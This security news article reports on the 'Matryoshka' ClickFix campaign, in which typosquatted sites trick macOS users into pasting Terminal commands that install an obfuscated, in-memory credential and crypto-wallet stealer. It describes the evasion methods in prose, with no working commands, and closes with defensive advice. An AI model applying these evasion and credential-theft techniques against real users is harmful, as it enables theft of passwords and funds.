A new and sophisticated social engineering campaign, dubbed “Matryoshka,” is targeting macOS users by deploying a dangerous stealer malware. This evolved version of the ClickFix attack technique uses intricate, nested obfuscation layers to evade security scanners and automated analysis systems. The campaign’s primary goal is to trick unsuspecting users into executing malicious Terminal commands that masquerade as legitimate software fixes, thereby bypassing common download-and-launch security protocols that many Mac users rely on.
The attackers are leveraging typosquatting domains, which are websites with slightly misspelled URLs mimicking legitimate ones. This strategy intercepts users who mistype addresses for popular software review sites. Upon reaching these fraudulent domains, victims are presented with a convincing fake installation prompt. This prompt instructs them to copy and paste a supposed “fix” command directly into their macOS Terminal application. Intego analysts identified this emergent attack chain after observing typosquatted domains, such as comparisions[.]org, which closely resembles the legitimate comparisons.org website.
Infection Mechanism and Evasion Tactics of Matryoshka Malware
Unlike previous iterations of the ClickFix attack that utilized more straightforward, readable scripts, the Matryoshka variant employs advanced evasion techniques. These methods are specifically designed to complicate detection efforts by security researchers and automated tools. The malicious payload is thoroughly encoded and compressed, remaining hidden until the moment of execution. Crucially, it unpacks and runs entirely in the computer’s memory, thereby avoiding the creation of discernible script files on the disk. This in-memory execution significantly reduces the visibility of the malware for file-based security scanning and makes static analysis considerably more challenging.
The infection sequence of the Matryoshka malware unfolds through multiple stages, each meticulously crafted to evade detection while maintaining stealth and operational effectiveness. When a victim pastes the malicious Terminal command provided by the attackers, it initiates the retrieval of a shell script. This script contains a substantial encoded payload concealed within a heredoc structure, a method for embedding literal data within a shell script. This data then passes through an in-memory pipeline where it is decoded and decompressed in a manner that leaves no easily detectable file artifacts on the system.
The loader component of the Matryoshka malware exhibits several ingenious evasion behaviors that allow it to operate unnoticed. It discreetly detaches its main operational routine to run in the background, allowing the Terminal prompt to return almost instantaneously. This rapid return leads victims to believe that the process has concluded successfully, when in reality, the malware has just begun its malicious activities. To further suppress any visible traces within the terminal session, the script actively redirects standard input, output, and error streams. Additionally, the malware’s command-and-control (C2) infrastructure is protected by requiring specific custom headers in its requests. Automated scanners that do not present these correct headers receive only generic error messages, effectively shielding the C2 server from unauthorized access and analysis.
The primary objective of the Matryoshka stealer malware, once successfully executed, is to harvest sensitive user information. The loader retrieves an AppleScript payload specifically engineered for this purpose. This payload meticulously targets browser credentials, aiming to steal login information stored by popular web browsers. Furthermore, it specifically targets cryptocurrency wallet applications, including prominent platforms like Trezor Suite and Ledger Live. The malware first attempts programmatic credential theft, a direct method of extracting stored passwords and authentication tokens. If this automated approach is unsuccessful, it resorts to displaying deceptive system dialog boxes that repeatedly solicit passwords from the user. This constant barrage of prompts aims to wear down the victim’s resistance, increasing the likelihood that they will eventually comply and inadvertently provide their credentials.
Security experts strongly advise macOS users to exercise extreme caution and never paste commands sourced from websites directly into their Terminal application. Legitimate software updates and system fixes do not require users to execute arbitrary commands in this manner. Organizations are further urged to implement proactive defense measures, including blocking identified typosquatting domains, diligently monitoring for unusual Terminal-initiated execution patterns, and actively watching for suspicious staging archives or any signs of tampering with cryptocurrency wallet applications. The evolving nature of such threats underscores the necessity for continuous vigilance and up-to-date security practices.